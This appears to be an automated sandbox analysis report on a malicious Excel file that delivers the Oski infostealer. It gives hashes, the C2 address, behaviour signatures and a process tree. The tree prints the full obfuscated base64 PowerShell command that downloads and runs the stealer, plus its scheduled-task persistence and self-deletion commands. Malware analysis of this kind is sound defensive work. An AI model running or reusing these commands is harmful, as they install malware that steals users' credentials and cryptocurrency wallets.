Analysis

  • max time kernel
    124s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    06/08/2021, 13:54

General

  • Target

    ORD_210539.xls

  • Size

    43KB

  • MD5

    bc998900cfb06a407c973873ba745776

  • SHA1

    232f5703a4744258407157e9f3b06b4c15171ef8

  • SHA256

    78bbff7297f8be0a95a2c3942c7c8d80bd6d68bc561543ba7c4275eb2e15e649

  • SHA512

    f80a6648c48ae90d9819cf1297358e1da2503a7a6dfad8398d78bdc9d8c6d02bde409b49ff4033fc70f1512003673c381a052491c431d7ff719abe1ac7b0d473

Malware Config

Extracted

Family

oski

C2

185.212.131.198/ww/

Signatures

  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • Downloads MZ/PE file
  • Loads dropped DLL 5 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Checks processor information in registry 2 TTPs 1 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\ORD_210539.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1832
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c pO^W^Ers^He^LL -e WwBzAFkAUwBUAEUAbQAuAHQARQB4AFQALgBFAE4AQwBPAEQASQBOAGcAXQA6ADoAdQBOAGkAQwBvAGQAZQAuAEcARQB0AHMAdAByAGkAbgBHACgAWwBTAHkAUwB0AGUAbQAuAGMATwBuAHYARQBSAFQAXQA6ADoAZgByAE8ATQBCAEEAUwBlADYANABTAFQAcgBpAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEcASQBBAGIAZwBCAHcAQQBIAGMAQQBkAEEAQgBxAEEASABrAEEAYwB3AEIAeQBBAEcAbwBBAGQAUQBCAGoAQQBIAGMAQQBaAGcAQgBzAEEARwBvAEEAYQB3AEIAbQBBAEcAcwBBAGMAUQBCAGkAQQBIAFkAQQBkAGcAQgAzAEEAQwBBAEEASwBBAEEAZwBBAEMAUQBBAGEAUQBCAHQAQQBIAFkAQQBaAFEAQgBqAEEASABRAEEAYwB3AEIAagBBAEgARQBBAFkAUQBCADMAQQBHADAAQQBkAHcAQgBqAEEARwBnAEEAYQBBAEIAawBBAEgAVQBBAEkAQQBBAHMAQQBDAEEAQQBKAEEAQgAzAEEARwBnAEEAYwB3AEIAbgBBAEgASQBBAGQAdwBCAGkAQQBIAE0AQQBjAGcAQgBtAEEARwBzAEEAWgBBAEIAcgBBAEcAYwBBAGMAdwBCADAAQQBHADQAQQBhAEEAQgB2AEEAQwBBAEEASwBRAEEATgBBAEEAbwBBAGUAdwBBAGcAQQBHAGsAQQBUAFEAQgBRAEEARwA4AEEAVQBnAEIAVQBBAEMAMABBAGIAUQBCAHYAQQBFAFEAQQBWAFEAQgBzAEEARwBVAEEASQBBAEIAaQBBAEcAawBBAFYAQQBCAHoAQQBIAFEAQQBjAGcAQgBCAEEARQA0AEEAVQB3AEIAbQBBAEUAVQBBAGMAZwBBADcAQQBBADAAQQBDAGcAQgBUAEEASABRAEEAUQBRAEIAUwBBAEgAUQBBAEwAUQBCAEMAQQBFAGsAQQBkAEEAQgB6AEEARgBRAEEAVQBnAEIAQgBBAEUANABBAGMAdwBCAEcAQQBFAFUAQQBjAGcAQQBnAEEAQwAwAEEAYwB3AEIAUABBAEYAVQBBAGMAZwBCAGoAQQBHAFUAQQBJAEEAQQBrAEEARwBrAEEAYgBRAEIAMgBBAEcAVQBBAFkAdwBCADAAQQBIAE0AQQBZAHcAQgB4AEEARwBFAEEAZAB3AEIAdABBAEgAYwBBAFkAdwBCAG8AQQBHAGcAQQBaAEEAQgAxAEEAQwBBAEEATABRAEIARQBBAEUAVQBBAGMAdwBCADAAQQBHAGsAQQBUAGcAQgBoAEEASABRAEEAYQBRAEIAUABBAEcANABBAEkAQQBBAGsAQQBIAGMAQQBhAEEAQgB6AEEARwBjAEEAYwBnAEIAMwBBAEcASQBBAGMAdwBCAHkAQQBHAFkAQQBhAHcAQgBrAEEARwBzAEEAWgB3AEIAegBBAEgAUQBBAGIAZwBCAG8AQQBHADgAQQBPAHcAQQBnAEEAQwBZAEEASQBBAEEAawBBAEgAYwBBAGEAQQBCAHoAQQBHAGMAQQBjAGcAQgAzAEEARwBJAEEAYwB3AEIAeQBBAEcAWQBBAGEAdwBCAGsAQQBHAHMAQQBaAHcAQgB6AEEASABRAEEAYgBnAEIAbwBBAEcAOABBAE8AdwBBAGcAQQBIADAAQQBkAEEAQgB5AEEASABrAEEAZQB3AEEAawBBAEgASQBBAGEAdwBCAG0AQQBHAGsAQQBhAGcAQgB5AEEARwA0AEEAZQBBAEIANQBBAEgAawBBAFoAQQBCAGkAQQBHADAAQQBkAHcAQgBqAEEARwBRAEEAYgBBAEIAdQBBAEgAawBBAGUAUQBCADEAQQBHAEkAQQBaAFEAQgBvAEEARwBJAEEAUABRAEEAawBBAEUAVQBBAGIAZwBCAFcAQQBEAG8AQQBkAEEAQgBGAEEARwAwAEEAYwBBAEEAcgBBAEMAYwBBAFgAQQBCAHMAQQBIAG8AQQBlAGcAQgB1AEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgBpAEEARwA0AEEAYwBBAEIAMwBBAEgAUQBBAGEAZwBCADUAQQBIAE0AQQBjAGcAQgBxAEEASABVAEEAWQB3AEIAMwBBAEcAWQBBAGIAQQBCAHEAQQBHAHMAQQBaAGcAQgByAEEASABFAEEAWQBnAEIAMgBBAEgAWQBBAGQAdwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAFkAQQBMAGcAQQB4AEEARABnAEEATQB3AEEAdQBBAEQASQBBAE0AZwBBAHoAQQBDADQAQQBNAHcAQQAwAEEAQwA4AEEAUgB3AEIANABBAEcATQBBAFEAUQBCAGsAQQBHAGsAQQBlAGcAQgBXAEEARwA0AEEAVABRAEIAdQBBAEQARQBBAFUAZwBCAEMAQQBFADgAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEoAQQBCAHkAQQBHAHMAQQBaAGcAQgBwAEEARwBvAEEAYwBnAEIAdQBBAEgAZwBBAGUAUQBCADUAQQBHAFEAQQBZAGcAQgB0AEEASABjAEEAWQB3AEIAawBBAEcAdwBBAGIAZwBCADUAQQBIAGsAQQBkAFEAQgBpAEEARwBVAEEAYQBBAEIAaQBBAEQAcwBBAEQAUQBBAEsAQQBHAEkAQQBiAGcAQgB3AEEASABjAEEAZABBAEIAcQBBAEgAawBBAGMAdwBCAHkAQQBHAG8AQQBkAFEAQgBqAEEASABjAEEAWgBnAEIAcwBBAEcAbwBBAGEAdwBCAG0AQQBHAHMAQQBjAFEAQgBpAEEASABZAEEAZABnAEIAMwBBAEMAQQBBAEoAdwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBPAEEAQQB6AEEAQwA0AEEATQBnAEEAeQBBAEQATQBBAEwAZwBBAHoAQQBEAFEAQQBMAHcAQgBIAEEASABnAEEAWQB3AEIAQgBBAEcAUQBBAGEAUQBCADYAQQBGAFkAQQBiAGcAQgBOAEEARwA0AEEATQBRAEIAUwBBAEUASQBBAFQAdwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAawBBAEgASQBBAGEAdwBCAG0AQQBHAGsAQQBhAGcAQgB5AEEARwA0AEEAZQBBAEIANQBBAEgAawBBAFoAQQBCAGkAQQBHADAAQQBkAHcAQgBqAEEARwBRAEEAYgBBAEIAdQBBAEgAawBBAGUAUQBCADEAQQBHAEkAQQBaAFEAQgBvAEEARwBJAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHUAQQBIAEEAQQBkAHcAQgAwAEEARwBvAEEAZQBRAEIAegBBAEgASQBBAGEAZwBCADEAQQBHAE0AQQBkAHcAQgBtAEEARwB3AEEAYQBnAEIAcgBBAEcAWQBBAGEAdwBCAHgAQQBHAEkAQQBkAGcAQgAyAEEASABjAEEASQBBAEEAbgBBAEcAZwBBAGQAQQBCADAAQQBIAEEAQQBPAGcAQQB2AEEAQwA4AEEATgBBAEEAMgBBAEMANABBAE0AUQBBADQAQQBEAE0AQQBMAGcAQQB5AEEARABJAEEATQB3AEEAdQBBAEQATQBBAE4AQQBBAHYAQQBFAGMAQQBlAEEAQgBqAEEARQBFAEEAWgBBAEIAcABBAEgAbwBBAFYAZwBCAHUAQQBFADAAQQBiAGcAQQB4AEEARgBJAEEAUQBnAEIAUABBAEMANABBAFoAUQBCADQAQQBHAFUAQQBKAHcAQQBnAEEAQwBRAEEAYwBnAEIAcgBBAEcAWQBBAGEAUQBCAHEAQQBIAEkAQQBiAGcAQgA0AEEASABrAEEAZQBRAEIAawBBAEcASQBBAGIAUQBCADMAQQBHAE0AQQBaAEEAQgBzAEEARwA0AEEAZQBRAEIANQBBAEgAVQBBAFkAZwBCAGwAQQBHAGcAQQBZAGcAQQA3AEEAQQAwAEEAQwBnAEIAOQBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEAIgApACkAfABJAGUAWAA=
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1652
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        pOWErsHeLL -e WwBzAFkAUwBUAEUAbQAuAHQARQB4AFQALgBFAE4AQwBPAEQASQBOAGcAXQA6ADoAdQBOAGkAQwBvAGQAZQAuAEcARQB0AHMAdAByAGkAbgBHACgAWwBTAHkAUwB0AGUAbQAuAGMATwBuAHYARQBSAFQAXQA6ADoAZgByAE8ATQBCAEEAUwBlADYANABTAFQAcgBpAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEcASQBBAGIAZwBCAHcAQQBIAGMAQQBkAEEAQgBxAEEASABrAEEAYwB3AEIAeQBBAEcAbwBBAGQAUQBCAGoAQQBIAGMAQQBaAGcAQgBzAEEARwBvAEEAYQB3AEIAbQBBAEcAcwBBAGMAUQBCAGkAQQBIAFkAQQBkAGcAQgAzAEEAQwBBAEEASwBBAEEAZwBBAEMAUQBBAGEAUQBCAHQAQQBIAFkAQQBaAFEAQgBqAEEASABRAEEAYwB3AEIAagBBAEgARQBBAFkAUQBCADMAQQBHADAAQQBkAHcAQgBqAEEARwBnAEEAYQBBAEIAawBBAEgAVQBBAEkAQQBBAHMAQQBDAEEAQQBKAEEAQgAzAEEARwBnAEEAYwB3AEIAbgBBAEgASQBBAGQAdwBCAGkAQQBIAE0AQQBjAGcAQgBtAEEARwBzAEEAWgBBAEIAcgBBAEcAYwBBAGMAdwBCADAAQQBHADQAQQBhAEEAQgB2AEEAQwBBAEEASwBRAEEATgBBAEEAbwBBAGUAdwBBAGcAQQBHAGsAQQBUAFEAQgBRAEEARwA4AEEAVQBnAEIAVQBBAEMAMABBAGIAUQBCAHYAQQBFAFEAQQBWAFEAQgBzAEEARwBVAEEASQBBAEIAaQBBAEcAawBBAFYAQQBCAHoAQQBIAFEAQQBjAGcAQgBCAEEARQA0AEEAVQB3AEIAbQBBAEUAVQBBAGMAZwBBADcAQQBBADAAQQBDAGcAQgBUAEEASABRAEEAUQBRAEIAUwBBAEgAUQBBAEwAUQBCAEMAQQBFAGsAQQBkAEEAQgB6AEEARgBRAEEAVQBnAEIAQgBBAEUANABBAGMAdwBCAEcAQQBFAFUAQQBjAGcAQQBnAEEAQwAwAEEAYwB3AEIAUABBAEYAVQBBAGMAZwBCAGoAQQBHAFUAQQBJAEEAQQBrAEEARwBrAEEAYgBRAEIAMgBBAEcAVQBBAFkAdwBCADAAQQBIAE0AQQBZAHcAQgB4AEEARwBFAEEAZAB3AEIAdABBAEgAYwBBAFkAdwBCAG8AQQBHAGcAQQBaAEEAQgAxAEEAQwBBAEEATABRAEIARQBBAEUAVQBBAGMAdwBCADAAQQBHAGsAQQBUAGcAQgBoAEEASABRAEEAYQBRAEIAUABBAEcANABBAEkAQQBBAGsAQQBIAGMAQQBhAEEAQgB6AEEARwBjAEEAYwBnAEIAMwBBAEcASQBBAGMAdwBCAHkAQQBHAFkAQQBhAHcAQgBrAEEARwBzAEEAWgB3AEIAegBBAEgAUQBBAGIAZwBCAG8AQQBHADgAQQBPAHcAQQBnAEEAQwBZAEEASQBBAEEAawBBAEgAYwBBAGEAQQBCAHoAQQBHAGMAQQBjAGcAQgAzAEEARwBJAEEAYwB3AEIAeQBBAEcAWQBBAGEAdwBCAGsAQQBHAHMAQQBaAHcAQgB6AEEASABRAEEAYgBnAEIAbwBBAEcAOABBAE8AdwBBAGcAQQBIADAAQQBkAEEAQgB5AEEASABrAEEAZQB3AEEAawBBAEgASQBBAGEAdwBCAG0AQQBHAGsAQQBhAGcAQgB5AEEARwA0AEEAZQBBAEIANQBBAEgAawBBAFoAQQBCAGkAQQBHADAAQQBkAHcAQgBqAEEARwBRAEEAYgBBAEIAdQBBAEgAawBBAGUAUQBCADEAQQBHAEkAQQBaAFEAQgBvAEEARwBJAEEAUABRAEEAawBBAEUAVQBBAGIAZwBCAFcAQQBEAG8AQQBkAEEAQgBGAEEARwAwAEEAYwBBAEEAcgBBAEMAYwBBAFgAQQBCAHMAQQBIAG8AQQBlAGcAQgB1AEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgBpAEEARwA0AEEAYwBBAEIAMwBBAEgAUQBBAGEAZwBCADUAQQBIAE0AQQBjAGcAQgBxAEEASABVAEEAWQB3AEIAMwBBAEcAWQBBAGIAQQBCAHEAQQBHAHMAQQBaAGcAQgByAEEASABFAEEAWQBnAEIAMgBBAEgAWQBBAGQAdwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAFkAQQBMAGcAQQB4AEEARABnAEEATQB3AEEAdQBBAEQASQBBAE0AZwBBAHoAQQBDADQAQQBNAHcAQQAwAEEAQwA4AEEAUgB3AEIANABBAEcATQBBAFEAUQBCAGsAQQBHAGsAQQBlAGcAQgBXAEEARwA0AEEAVABRAEIAdQBBAEQARQBBAFUAZwBCAEMAQQBFADgAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEoAQQBCAHkAQQBHAHMAQQBaAGcAQgBwAEEARwBvAEEAYwBnAEIAdQBBAEgAZwBBAGUAUQBCADUAQQBHAFEAQQBZAGcAQgB0AEEASABjAEEAWQB3AEIAawBBAEcAdwBBAGIAZwBCADUAQQBIAGsAQQBkAFEAQgBpAEEARwBVAEEAYQBBAEIAaQBBAEQAcwBBAEQAUQBBAEsAQQBHAEkAQQBiAGcAQgB3AEEASABjAEEAZABBAEIAcQBBAEgAawBBAGMAdwBCAHkAQQBHAG8AQQBkAFEAQgBqAEEASABjAEEAWgBnAEIAcwBBAEcAbwBBAGEAdwBCAG0AQQBHAHMAQQBjAFEAQgBpAEEASABZAEEAZABnAEIAMwBBAEMAQQBBAEoAdwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBPAEEAQQB6AEEAQwA0AEEATQBnAEEAeQBBAEQATQBBAEwAZwBBAHoAQQBEAFEAQQBMAHcAQgBIAEEASABnAEEAWQB3AEIAQgBBAEcAUQBBAGEAUQBCADYAQQBGAFkAQQBiAGcAQgBOAEEARwA0AEEATQBRAEIAUwBBAEUASQBBAFQAdwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAawBBAEgASQBBAGEAdwBCAG0AQQBHAGsAQQBhAGcAQgB5AEEARwA0AEEAZQBBAEIANQBBAEgAawBBAFoAQQBCAGkAQQBHADAAQQBkAHcAQgBqAEEARwBRAEEAYgBBAEIAdQBBAEgAawBBAGUAUQBCADEAQQBHAEkAQQBaAFEAQgBvAEEARwBJAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHUAQQBIAEEAQQBkAHcAQgAwAEEARwBvAEEAZQBRAEIAegBBAEgASQBBAGEAZwBCADEAQQBHAE0AQQBkAHcAQgBtAEEARwB3AEEAYQBnAEIAcgBBAEcAWQBBAGEAdwBCAHgAQQBHAEkAQQBkAGcAQgAyAEEASABjAEEASQBBAEEAbgBBAEcAZwBBAGQAQQBCADAAQQBIAEEAQQBPAGcAQQB2AEEAQwA4AEEATgBBAEEAMgBBAEMANABBAE0AUQBBADQAQQBEAE0AQQBMAGcAQQB5AEEARABJAEEATQB3AEEAdQBBAEQATQBBAE4AQQBBAHYAQQBFAGMAQQBlAEEAQgBqAEEARQBFAEEAWgBBAEIAcABBAEgAbwBBAFYAZwBCAHUAQQBFADAAQQBiAGcAQQB4AEEARgBJAEEAUQBnAEIAUABBAEMANABBAFoAUQBCADQAQQBHAFUAQQBKAHcAQQBnAEEAQwBRAEEAYwBnAEIAcgBBAEcAWQBBAGEAUQBCAHEAQQBIAEkAQQBiAGcAQgA0AEEASABrAEEAZQBRAEIAawBBAEcASQBBAGIAUQBCADMAQQBHAE0AQQBaAEEAQgBzAEEARwA0AEEAZQBRAEIANQBBAEgAVQBBAFkAZwBCAGwAQQBHAGcAQQBZAGcAQQA3AEEAQQAwAEEAQwBnAEIAOQBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEAIgApACkAfABJAGUAWAA=
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1308
        • C:\Users\Admin\AppData\Local\Temp\lzzn.exe
          "C:\Users\Admin\AppData\Local\Temp\lzzn.exe"
          4⤵
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:1120
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BqppCjWADhQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4116.tmp"
            5⤵
            • Creates scheduled task(s)
            PID:1032
          • C:\Users\Admin\AppData\Local\Temp\lzzn.exe
            "C:\Users\Admin\AppData\Local\Temp\lzzn.exe"
            5⤵
            • Loads dropped DLL
            • Checks processor information in registry
            • Suspicious use of WriteProcessMemory
            PID:912
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c taskkill /pid 912 & erase C:\Users\Admin\AppData\Local\Temp\lzzn.exe & RD /S /Q C:\\ProgramData\\776240331877263\\* & exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:624
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /pid 912
                7⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1648

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/912-100-0x0000000000400000-0x0000000000438000-memory.dmp

          Filesize

          224KB

        • memory/912-103-0x0000000000400000-0x0000000000438000-memory.dmp

          Filesize

          224KB

        • memory/1120-97-0x0000000004370000-0x00000000043A4000-memory.dmp

          Filesize

          208KB

        • memory/1120-96-0x0000000005480000-0x0000000005513000-memory.dmp

          Filesize

          588KB

        • memory/1120-95-0x0000000000500000-0x0000000000513000-memory.dmp

          Filesize

          76KB

        • memory/1120-94-0x0000000004FC0000-0x0000000004FC1000-memory.dmp

          Filesize

          4KB

        • memory/1120-92-0x00000000000D0000-0x00000000000D1000-memory.dmp

          Filesize

          4KB

        • memory/1308-68-0x0000000004872000-0x0000000004873000-memory.dmp

          Filesize

          4KB

        • memory/1308-69-0x0000000002610000-0x0000000002611000-memory.dmp

          Filesize

          4KB

        • memory/1308-88-0x00000000063D0000-0x00000000063D1000-memory.dmp

          Filesize

          4KB

        • memory/1308-87-0x0000000006390000-0x0000000006391000-memory.dmp

          Filesize

          4KB

        • memory/1308-80-0x0000000006260000-0x0000000006261000-memory.dmp

          Filesize

          4KB

        • memory/1308-79-0x00000000061C0000-0x00000000061C1000-memory.dmp

          Filesize

          4KB

        • memory/1308-75-0x000000007EF30000-0x000000007EF31000-memory.dmp

          Filesize

          4KB

        • memory/1308-73-0x0000000006170000-0x0000000006171000-memory.dmp

          Filesize

          4KB

        • memory/1308-70-0x0000000004850000-0x0000000004851000-memory.dmp

          Filesize

          4KB

        • memory/1308-89-0x0000000000440000-0x0000000000441000-memory.dmp

          Filesize

          4KB

        • memory/1308-67-0x0000000004870000-0x0000000004871000-memory.dmp

          Filesize

          4KB

        • memory/1308-66-0x00000000048B0000-0x00000000048B1000-memory.dmp

          Filesize

          4KB

        • memory/1308-65-0x0000000002140000-0x0000000002141000-memory.dmp

          Filesize

          4KB

        • memory/1308-64-0x0000000074D91000-0x0000000074D93000-memory.dmp

          Filesize

          8KB

        • memory/1832-59-0x000000002F371000-0x000000002F374000-memory.dmp

          Filesize

          12KB

        • memory/1832-61-0x000000005FFF0000-0x0000000060000000-memory.dmp

          Filesize

          64KB

        • memory/1832-60-0x0000000070E81000-0x0000000070E83000-memory.dmp

          Filesize

          8KB